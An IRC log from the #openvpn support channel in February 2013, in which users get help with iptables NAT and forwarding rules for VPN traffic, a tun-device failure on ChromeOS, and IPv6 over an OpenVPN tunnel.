allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 17:42 < Kireji> are there other security concerns I need to understand for "# Uncomment the next line to enable packet forwarding for IPv4 17:42 < Kireji> #net.ipv4.ip_forward=1 17:42 < Kireji> " 17:46 < Kireji> !nat 17:46 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 17:47 < Kireji> !linnat 17:47 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 17:49 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 17:54 < Kireji> 17:54 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Read error: Connection reset by peer] 18:05 < Kireji> success! - (sort of) 18:06 < Kireji> I followed the linipforward and linnat instructions, and now the web browser appears to be doing what I expect. when I visit a website in the browser, the connection is tunneled (redirected?) through the openvpn server 18:06 < Kireji> strangely, when I try and ssh, the connection is not tunneled 18:08 < Kireji> how do I tell the kernel to use the tun0 interface when I use the ssh client on the laptop? 18:11 < Kireji> interesting - it's ONLY the route to the opnvpn server that is not being tunneled 18:12 < Kireji> weird, that's the one I want tunneled 18:22 < Kireji> hmmm. yeah to connections to the openvpn server (the remote entry in the client config) are not going through the 10.8.0.1 gateway. all the others are. how do I tell tunnelblick on to put *ALL* the conections through the tun0 interface? 18:31 < Kireji> yup, there is is, right in the routing table, it adds "0/1 10.8.0.5" on the first line, above the default destination (correct) - and then 18:32 < Kireji> last line of the routing table after tunnelblick is fully cennected is "xxx.xxx.247.15/32 192.168.5.1 ... en1" where the xxx address is the remote address 18:35 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 18:36 < Kireji> daemoen: kisom: pekster: you guys were super helpful before - maybe if I reference you by name your irc client will ping you? 18:42 -!- p3rror [~mezgani@2001:0:53aa:64c:1823:5b24:d606:8bc8] has quit [Ping timeout: 245 seconds] 18:45 < Kireji> (heh) I think I'm seeing now why the routing table has to have that entry 18:45 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 244 seconds] 18:48 -!- ASUchander [~asuchande@cpe-071-070-224-227.nc.res.rr.com] has quit [Remote host closed the connection] 19:02 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 19:04 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 245 seconds] 19:04 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 19:07 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in] 19:08 -!- raidz is now known as raidz_away 19:11 < Kireji> I just have to refer to the openvpn server with it's 10.8 address, and it's all good! 19:15 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Ping timeout: 264 seconds] 19:16 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 19:40 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 276 seconds] 19:57 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 20:19 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 20:36 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 20:41 -!- James_Epp [~derp@216.36.170.104] has joined #openvpn 20:41 < James_Epp> I am working in PfSense and really buggered up my configuration. How do I reset all of the settings? #pfsense is quiet. 20:42 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 20:42 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 20:42 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 20:42 -!- mode/#openvpn [+o krzee] by ChanServ 20:43 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection] 20:44 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 20:44 -!- mode/#openvpn [+o krzee] by ChanServ 20:45 * EugeneKay gives pants to krzee 20:46 <@krzee> nopants! 20:51 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 20:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 20:52 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 20:52 -!- mode/#openvpn [+o krzee] by ChanServ 21:18 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: Leaving] 21:40 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 22:09 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 22:34 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 22:48 -!- James_Epp [~derp@216.36.170.104] has quit [Quit: ThrashIRC v2.8 sic populo comunicated] 22:49 -!- batrick [~batrick@nmap/developer/batrick] has quit [Quit: WeeChat 0.3.9.2] 22:49 -!- batrick [~batrick@nmap/developer/batrick] has joined #openvpn 23:00 -!- Devastator- [~devas@186.214.110.60] has joined #openvpn 23:01 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 252 seconds] 23:40 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn --- Day changed Sat Feb 16 2013 01:07 -!- b1rkh0ff [~b1rkh0ff@178.77.18.35] has quit [Ping timeout: 244 seconds] 01:21 -!- b1rkh0ff [~b1rkh0ff@178.77.20.251] has joined #openvpn 01:36 -!- Orbi [~opera@109.129.24.113] has joined #openvpn 01:36 -!- Orbi [~opera@109.129.24.113] has left #openvpn [] 01:45 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 01:47 -!- xbanux [~xbanux@triband-mum-59.182.166.224.mtnl.net.in] has joined #openvpn 02:05 -!- brute11k1 [~brute11k@89.249.235.89] has joined #openvpn 02:06 -!- brute11k [~brute11k@89.249.235.89] has quit [Ping timeout: 248 seconds] 02:32 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 02:32 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 02:33 -!- mode/#openvpn [+o vpnHelper] by ChanServ 02:36 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Read error: Network is unreachable] 02:36 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 02:36 -!- mode/#openvpn [+o vpnHelper] by ChanServ 02:40 -!- brute11k1 [~brute11k@89.249.235.89] has quit [Read error: Operation timed out] 02:41 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 02:52 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 03:37 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 04:12 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection] 04:18 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 04:20 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 04:25 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 245 seconds] 04:25 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 04:31 -!- meepmeep [~meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 04:49 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 04:51 -!- mnathani [~mnathani@198.84.231.11] has quit [] 04:52 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 04:55 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has quit [Ping timeout: 264 seconds] 04:56 -!- xbanux [~xbanux@triband-mum-59.182.166.224.mtnl.net.in] has quit [Read error: Connection reset by peer] 04:56 -!- xbanux [~xbanux@triband-mum-59.182.146.167.mtnl.net.in] has joined #openvpn 05:00 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 05:09 -!- xbanux [~xbanux@triband-mum-59.182.146.167.mtnl.net.in] has quit [Read error: Connection reset by peer] 05:10 -!- xbanux [~xbanux@triband-mum-59.182.179.193.mtnl.net.in] has joined #openvpn 05:13 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Read error: Connection reset by peer] 05:22 -!- AsadH is now known as zz_AsadH 05:40 -!- HyperGlide [~HyperGlid@110.185.147.126] has joined #openvpn 05:44 -!- xbanux [~xbanux@triband-mum-59.182.179.193.mtnl.net.in] has quit [Read error: Connection reset by peer] 05:45 -!- xbanux [~xbanux@triband-mum-59.182.135.141.mtnl.net.in] has joined #openvpn 05:50 -!- xbanux [~xbanux@triband-mum-59.182.135.141.mtnl.net.in] has quit [Read error: Connection reset by peer] 05:50 -!- xbanux [~xbanux@triband-mum-59.182.149.239.mtnl.net.in] has joined #openvpn 05:57 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 06:11 -!- brute11k [~brute11k@89.249.235.89] has quit [Read error: Operation timed out] 06:11 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn 06:14 -!- Devastator- [~devas@186.214.110.60] has quit [Changing host] 06:14 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 06:15 -!- Devastator- is now known as Devastator 06:25 -!- HyperGlide [~HyperGlid@110.185.147.126] has quit [Remote host closed the connection] 06:25 -!- HyperGlide [~HyperGlid@110.185.147.126] has joined #openvpn 06:30 -!- HyperGlide [~HyperGlid@110.185.147.126] has quit [Ping timeout: 244 seconds] 06:36 -!- erry is now known as zombierry 06:43 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 06:43 -!- mode/#openvpn [+v s7r] by ChanServ 06:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds] 06:46 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 252 seconds] 06:46 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn 06:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:58 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 07:03 -!- master_of_master [~master_of@p57B54A92.dip.t-dialin.net] has quit [Ping timeout: 245 seconds] 07:05 -!- master_of_master [~master_of@p57B542F9.dip.t-dialin.net] has joined #openvpn 07:07 -!- gedO_ [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 07:08 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Ping timeout: 256 seconds] 07:21 -!- brute11k1 [~brute11k@89.249.230.159] has joined #openvpn 07:22 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 264 seconds] 07:36 -!- HyperGlide [~HyperGlid@110.185.147.126] has joined #openvpn 07:40 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 07:40 -!- HyperGlide [~HyperGlid@110.185.147.126] has quit [Ping timeout: 255 seconds] 07:42 -!- gedO_ [~quassel@client-178-16-35-81.inturbo.lt] has quit [Ping timeout: 244 seconds] 07:48 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:54 -!- gedO_ [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 07:57 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Ping timeout: 252 seconds] 08:05 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 08:07 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 08:08 -!- gedO_ [~quassel@client-178-16-35-81.inturbo.lt] has quit [Ping timeout: 248 seconds] 08:14 -!- gedO_ [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 08:17 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Ping timeout: 248 seconds] 08:20 -!- p3rror [~mezgani@2001:0:53aa:64c:105b:1370:d606:8bc8] has joined #openvpn 08:22 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 08:27 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 08:29 -!- gedO_ [~quassel@client-178-16-35-81.inturbo.lt] has quit [Ping timeout: 248 seconds] 08:38 -!- diffen3 [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 08:39 -!- diffen3 [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Client Quit] 08:41 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Ping timeout: 248 seconds] 08:48 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 08:53 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 09:14 -!- zombierry is now known as erry 09:16 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds] 09:23 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Read error: No route to host] 09:24 -!- HyperGlide [~HyperGlid@110.185.147.126] has joined #openvpn 09:24 -!- HyperGlide [~HyperGlid@110.185.147.126] has quit [Remote host closed the connection] 09:36 < bandroidx> how much extra processing on the server and the client does tls-auth take when its enabled? 09:39 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 256 seconds] 09:40 -!- Orbi [~opera@109.129.24.113] has joined #openvpn 09:48 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 09:55 -!- p3rror [~mezgani@2001:0:53aa:64c:105b:1370:d606:8bc8] has quit [Ping timeout: 245 seconds] 10:06 -!- p3rror [~mezgani@2001:0:53aa:64c:2843:1370:d606:7355] has joined #openvpn 10:19 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 10:33 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:52 -!- Orbi [~opera@109.129.24.113] has left #openvpn [] 10:57 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 10:59 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 11:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 11:03 -!- Orbi [~opera@109.129.24.113] has joined #openvpn 11:07 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 11:08 -!- Sickness\ is now known as sickness\ 11:15 -!- xbanux [~xbanux@triband-mum-59.182.149.239.mtnl.net.in] has quit [Ping timeout: 245 seconds] 11:25 -!- sickness\ is now known as Sickness\ 11:29 -!- xbanux [~xbanux@triband-mum-59.182.149.239.mtnl.net.in] has joined #openvpn 11:33 -!- Sickness\ is now known as sickness\ 11:34 -!- Orbi [~opera@109.129.24.113] has quit [Quit: Orbi] 11:34 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 11:41 -!- sickness\ is now known as Sickness\ 11:58 -!- RichardBronosky [~RichardBr@ec2-50-17-28-78.compute-1.amazonaws.com] has quit [Ping timeout: 252 seconds] 11:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 12:01 -!- RichardBronosky [~RichardBr@ec2-50-17-28-78.compute-1.amazonaws.com] has joined #openvpn 12:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 12:45 -!- else- [~else@towely.iodev.org] has joined #openvpn 12:45 < else-> hello, i'm trying to start an openvpn tunnel from a cronjob, but all i get is "Starting virtual private network daemon: foobar failed" 12:45 < else-> i can start it manually using the same user though 12:45 < else-> any idea on how to increase verbosity? 13:16 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:22 -!- brute11k1 [~brute11k@89.249.230.159] has quit [Read error: Connection reset by peer] 13:27 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 276 seconds] 13:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:58 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Ping timeout: 245 seconds] 14:07 -!- p3rror [~mezgani@2001:0:53aa:64c:2843:1370:d606:7355] has quit [Ping timeout: 245 seconds] 14:10 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 14:17 -!- xbanux [~xbanux@triband-mum-59.182.149.239.mtnl.net.in] has quit [Ping timeout: 276 seconds] 14:20 -!- p3rror [~mezgani@2001:0:53aa:64c:3434:1370:d673:ec6e] has joined #openvpn 14:26 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn 14:35 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Ping timeout: 256 seconds] 14:36 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Textual IRC Client: http://www.textualapp.com/] 14:56 -!- k1ng [~k1ng@76.73.57.172] has joined #openvpn 14:56 -!- k1ng [~k1ng@76.73.57.172] has quit [Changing host] 14:56 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 15:04 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:11 -!- p3rror [~mezgani@2001:0:53aa:64c:3434:1370:d673:ec6e] has quit [Ping timeout: 245 seconds] 15:20 -!- b1rkh0ff [~b1rkh0ff@178.77.20.251] has quit [Quit: Leaving] 15:21 < Kireji> so I got openVPN set up to do redirect teh way I want, and I used the iptables commands from the bot to do it. Unfortunately, I don't really understand what the commands have done, or what the implications are for security. 15:22 < Kireji> Can someone help me understand what the rules these two commands have inserted into iptables do: (1) "sudo iptables -I FORWARD -i tun+ -j ACCEPT" and (2) "sudo iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE" 15:24 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [] 15:25 -!- p3rror [~mezgani@2001:0:53aa:64c:24c1:1370:d606:a004] has joined #openvpn 15:38 -!- p3rror [~mezgani@2001:0:53aa:64c:24c1:1370:d606:a004] has quit [Ping timeout: 245 seconds] 15:43 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 15:51 -!- p3rror [~mezgani@2001:0:53aa:64c:5e:1370:d670:1b9f] has joined #openvpn 16:10 -!- p3rror [~mezgani@2001:0:53aa:64c:5e:1370:d670:1b9f] has quit [Ping timeout: 245 seconds] 16:17 -!- p3rror [~mezgani@2001:0:53aa:64c:10bd:37b4:d670:1b9f] has joined #openvpn 16:39 < kisom> Kireji: I suggest you read the iptables manual. 16:56 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 17:01 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 17:02 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 17:22 -!- p3rror [~mezgani@2001:0:53aa:64c:10bd:37b4:d670:1b9f] has quit [Ping timeout: 245 seconds] 17:35 -!- p3rror [~mezgani@2001:0:53aa:64c:c97:37b4:d607:599a] has joined #openvpn 17:38 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:39 < Kireji> true. thanks 18:34 -!- p3rror [~mezgani@2001:0:53aa:64c:c97:37b4:d607:599a] has quit [Ping timeout: 245 seconds] 18:58 -!- tr3nx [~me@c-98-225-113-64.hsd1.az.comcast.net] has joined #openvpn 18:58 -!- tr3nx [~me@c-98-225-113-64.hsd1.az.comcast.net] has quit [Client Quit] 19:27 <+s7r> if I have a dual stack ipv4 & ipv6 openvpn server and only ipv4 client can the client reach the ipv6 internet via the vpn tunnel? 19:27 <+s7r> in some way ? 19:52 -!- max_ [~max@98.225.19.83] has joined #openvpn 19:57 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 252 seconds] 19:58 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 20:00 < pekster> s7r: Yes, although the client OS must support IPv6 software-wise. See the --tun-ipv6 option in the manpage, and the section titled 'IPv6 Related Options' 20:01 <+s7r> thanks 20:01 <+s7r> so technically it is possible 20:01 <+s7r> either ipv6 = ipv6 tunnel, ipv4 - ipv4 or ipv4 - ipv4/ipv6 20:01 < pekster> You have to give the client an IPv4 address either way 20:02 < pekster> You can, however, just use a bogus rfc1918 subnet you never plan on actually using 20:02 <+s7r> i need a RFC1918 subnet even if i could tunnel ipv6-ipv6 ? 20:03 < pekster> Just for the VPN network 20:03 < pekster> It's a completely virtual network that you can happily ignore if you don't plan on using it 20:05 <+s7r> yeah i know but it's a requirment or optional? i'm thinking if i would have native ipv6 on the client side also, why would i need RFC1918 for ipv4 tunneling 20:09 < pekster> Well, it doesn't *need* to be rfc1918, but it's stupid to use a public block of IPs if you don't even plan on using the v4 addresses anyway 20:09 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 272 seconds] 20:09 <+s7r> but it won't work with ipv4 disabled, just ipv6 enabled ? 20:10 < pekster> No 20:10 < pekster> You cannot run openpvn in a mode where it does not allocate a virtual IPv4 IP to the server and clients 20:10 < pekster> I don't see why this is a problem 20:11 <+s7r> it's not 20:11 <+s7r> i was just asking 20:11 <+s7r> i thought it works 20:12 < pekster> Eventually the IPv4 requirement will probably be lifted, but AFAIK there's no rush to do that since most of the world is still accessed over the IPv4-Internet 20:12 <+s7r> yes 20:12 <+s7r> that's right 20:12 <+s7r> many thanks for your help pekster 20:13 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 20:18 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 20:19 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 20:32 -!- Kovica [~Kovica@77.38.49.83] has joined #openvpn 20:40 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 21:22 -!- Kovica [~Kovica@77.38.49.83] has quit [Remote host closed the connection] 21:23 -!- brute11k1 [~brute11k@89.249.230.159] has joined #openvpn 21:25 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 255 seconds] 21:29 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn 21:29 < roue> hola 21:29 < roue> I'm trying to run openvpn under Chromeos. 21:29 < roue> On a chromebook, that is. 21:29 < roue> Their build is seg faulting. 21:30 < roue> I installed a debian wheezy chroot and tried to launch via that. No longer segfaults but it still fails to properly initiate the connection. 21:30 < roue> I've got several other systems using my openvpn install without issue. The clients are a combination of linux (debian) and MacOSX. 21:31 < roue> I figured this would be easy. Just set up the keys, copy over the files and config and go. 21:31 < pekster> What is "their build" ? Something downstream patched from the official release? 21:31 < roue> It's turning into a PITA. 21:32 < roue> the ChromeOS version is 2.1.12 [SSL] [LZ02] [EPOLL] [PKCS11] 21:32 < pekster> That's very, very old 21:33 < roue> the debian chroot version I've tried is 2.2.1 [SSL] [LZ02] [EPOLL] [PKCS11] [eurephia] [MH] [PF_INET6] [IPv6 payload 20110424-2 (2.2RC2)] 21:33 < pekster> We're up to 2.3.0 now. If you're performing builds, especially ones where you want IPv6 connectivity, the 2.3 series is probably what you want 21:34 < roue> the server is OpenVPN 2.1_rc11 i486-pc-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] 21:34 < pekster> Ultimately to fix the segfault you should build with debugging enabled (ie: CFLAGS="-ggdb -fnoomit-frame-pointer") and not strip debug symbols, and get a stack trace 21:35 < pekster> But, the issue may well have been fixed in the last 2 major point-releases OpenVPN has done, so IMO you're better off working to build a more recent copy of upstream 21:35 < roue> It seg faults with the Chromeos build. With the debian build it just sits and spins forever. 21:35 < roue> I'm not sure whether it's a problem with openvpn or something wrong with the tun/tap device. 21:36 < pekster> Verbose logs would help if you have a build that is not crashing but not doing what you expect 21:36 < roue> pekster if you've got time to take a peek I'll generate them. 21:36 < pekster> Things like segfaults can of course be considered bugs, but "it segfaults" is a bad way to give you any answer other than "some bit of code is broken" 21:36 < roue> sure. 21:37 < pekster> 'verb 4' is a good place to start, and you may need 'verb 5' if the issue is realted to firewalls or one direction of traffic flow being dropped 21:37 < roue> I'll give you logs from the non-segfaulting debian install. 21:37 < roue> do you have a preferred pastebin? 21:38 < pekster> I'm somewhat partial to gist.github.com, but really "anything" is fine. I just dislike pastebin.com's ads, so you'll make me happy using something with non-annoying ads ;) 21:38 < pekster> So no, I don't "really" care 21:45 < roue> https://gist.github.com/anonymous/d6d8e428101af016a09e 21:45 <@vpnHelper> Title: openvpn on chromeos (at gist.github.com) 21:45 < roue> that's the log 21:46 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 21:50 < pekster> A couple lines got mangled there, but line 335 in the actual paste shows that tun0 was opened, but on line 339 you get errors claiming the device doesn't exist reported from ifconfig 21:51 < roue> yeah, i noticed that too. I think chromeos may have a non-functional tun device. 21:52 < roue> I can manually tunctl add a device, but don't really know how to test it. 21:52 < roue> or if there's some way to work around it. 21:53 < pekster> Well, you could see --ifconfig-noexec in the manpage if you want to use custom scripts instead of having openvpn configure the device 21:53 < pekster> That's really just a work-around of the issue, but may work for you. Obviously something is causing ifconfig to fail like that, either the tun0 device not getting created despite successful return when openvpn asks the system to do so, or some issue accessing the device by ifconfig 21:55 < roue> Hmm.. okay, I'll give that a shot. --ifconfig-noexec and --route-noexec . 21:55 < roue> manually configure the device and the route. 21:56 < pekster> See the referenced scripts in those commands, and the section 'SCRIPTING AND ENVIRONMENTAL VARIABLES' will be useful so you know what env-vars you get that your script is expected to deal with for routes passed, etc 21:59 < pekster> I also prefer using iproute2 for configurations (which is not the default build, although some distros may make it their default or provide it as an option) via the --enable-iproute2 command. I'm not sure if your issues is ifconfig, or the actual creation of the dynamic tun device 22:00 < pekster> That's a ./configure option, for clarification 22:01 < roue> pre-creating the tun0 device and starting with ifconfig-noexec and route-noexec seems to have established the connection. 22:02 < roue> don't understand enough about how to manually configure the tun0 device and routes to make it useful but I'll keep working on that. 22:02 < pekster> If you want to go that route, yea. As a client, it needs to configure the address the server is pushing, plus any routes, etc 22:03 < pekster> It's a little odd that it's broken like that, although that is also a release that is years old now 22:03 < pekster> Could be an OS thing too, as you suggested 22:06 < pekster> 1 sec, I'll pastebin you a minimal p2p config you can run locally to test and see if the tun0 setup works in a "most basic" config 22:08 < roue> thanks., 22:10 < pekster> https://gist.github.com/anonymous/4970097 22:10 <@vpnHelper> Title: gist:4970097 (at gist.github.com) 22:11 < roue> that's from the chromebook to itself? 22:12 < pekster> Right. It'll act as both the "client" and "server" (technically p2p has no notion of client/server, but the "server" is thet one waiting for an inbound connection in this case) 22:12 < pekster> Even doing the top setup only will still cause the tun device to get created 22:13 < pekster> I just included the 2nd part in case you wanted to actually connect to it and try a connectivity test such as pinging the peer from the other instance (firewall needs to allow the traffic too, of course) 22:17 < roue> with --dev tun it's not creating the tun0 device and failing. If I run openvpn --mktun --dev tun0 and tun1 I can specify --dev tun0 (on the first instance and --dev tun1 on teh second and it gets to "Initialization Sequence Completed" on both sides. 22:17 < roue> and I can ping both 10.50.0.1 and 0.2 22:18 < pekster> fyi, the ping normally is sourced from its own IP, so you need to bind the ping to the other peer 22:18 < pekster> but, that's really not part of your issue here 22:18 < pekster> So, something is not working in the handoff between openvpn and the OS to dynamically create the tun device 22:18 < pekster> Maybe that's fixed in a newer version. I'm not really sure it's productive to debug the 2.1.12 release... 22:19 < roue> understood. I can probably build the latest release in my chroot. 22:19 < roue> Is it backward compatible with my 2.1 server ? 22:19 < pekster> Yup 22:19 < pekster> 2.x is back-wards compatible down to 2.0.x, but not 1.x 22:20 < roue> any glaring security issues with the older versions? 22:23 < pekster> Doesn't look like it, but http://openvpn.net/index.php/open-source/documentation/change-log.html is the full changelog 22:23 <@vpnHelper> Title: Changelogs (at openvpn.net) 22:23 < pekster> Besides issues with openssl and such, but on Unix/Linux that's normally handled by dynamic linking; Windonws builds provide their own openssl libs, and is potentially a problem for old versiosn 22:25 < pekster> I also have no clue what "2.1.12" is since upstream never released that 22:25 < pekster> 2.1.4 is the latest in the 2.1.x series 22:25 < pekster> Oh, 2.1_rc11 is in your output, I see 22:26 < roue> I think I got it. 22:26 < roue> manually did the mktun 22:26 < roue> ran openvpn with --ifconfig-noexec and --route-noexec 22:26 < pekster> You are using a version that's nearly 5 years old 22:26 < roue> once the connection was established I ifconfig'd tun0 22:26 < roue> and then manually entered in the route add's . 22:27 < pekster> If it's just the tun-creation issue, you can mktun or use your OS to do that, then maybe ifconfig will work? 22:27 < pekster> Dunno, I'll leave it to you to work through fixing that. And go slap your distro provider for not using a version more recent than 54 months 22:27 < roue> I tried that first, but it dies on the route adding. 22:27 < roue> well... it's debian :) 22:28 < pekster> http://packages.qa.debian.org/o/openvpn.html 22:28 